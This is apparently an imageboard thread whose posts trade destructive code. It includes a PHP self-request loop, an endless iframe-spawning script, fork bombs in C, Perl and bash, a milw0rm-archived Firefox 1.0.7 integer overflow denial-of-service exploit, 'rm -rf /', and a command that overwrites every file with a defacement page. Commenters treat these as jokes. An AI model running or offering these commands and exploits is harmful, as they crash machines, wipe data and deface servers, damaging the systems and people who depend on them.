<?php
echo(" ");
readfile("http://".$HTTP_HOST.$REQUEST_URI);
?>
<script>
while(true){
document.write('<iframe src="'+location.href+'"></iframe>');
}
</script>
#include <unistd.h>
void main()
{
fork(); main();
}
Mozilla Firefox <= 1.0.7 Integar Overflow Denial of Service Exploit
<!-- I think of mil more of as a security archive. :)
Just to let people know
Georgi Guninski is one bad mofo /str0ke -->
<html>
Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
</html>
# milw0rm.com [2005-09-26]
>>4
doesn't do anything except make "out of memory" show up in the javascript console on my firefox 1.0.7...
perl -e "while(1){fork}"
perl -e 'fork until 0'
:(){ :|:& };:
rm -rf /
I like imagining that I have an evil henchman named "Sudo".
Sudo, kill 1923!
echo 0wnz3d > /var/www/index.html
find -type f -exec cp /var/www/index.html {} \;
iptables -F INPUT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --sport 80 -j ACCEPT
iptables -A INPUT -j REJECT
>>12 is a script kiddie. Also, an incompetent one.
>>13 wins!